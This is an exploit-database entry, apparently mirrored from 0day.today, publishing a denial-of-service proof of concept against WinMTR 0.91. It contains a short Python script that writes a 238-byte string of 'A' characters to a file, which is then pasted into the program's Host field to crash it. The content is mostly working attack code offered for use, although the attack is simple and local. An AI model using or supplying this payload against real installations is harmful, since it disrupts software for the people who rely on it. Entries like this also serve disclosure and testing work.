id: 31517
date: 11/02/2018
title: WinMTR 0.91 - Denial of Service Exploit
author: Ihsan Sencan
cves: 

# Exploit Title: WinMTR 0.91 - Denial of Service (PoC)
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://winmtr.net
# Software Link: http://winmtr.net/winmtr_download/
# Version: 0.91
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
 
# POC: 
# 1)
# Host: Payload
 
#!/usr/bin/python
     
buffer = "A" * 238
  
payload = buffer
try:
    f=open("exp.txt","w")
    print "[+] Creating %s bytes evil payload." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created."

#  0day.today [2023-03-21]  #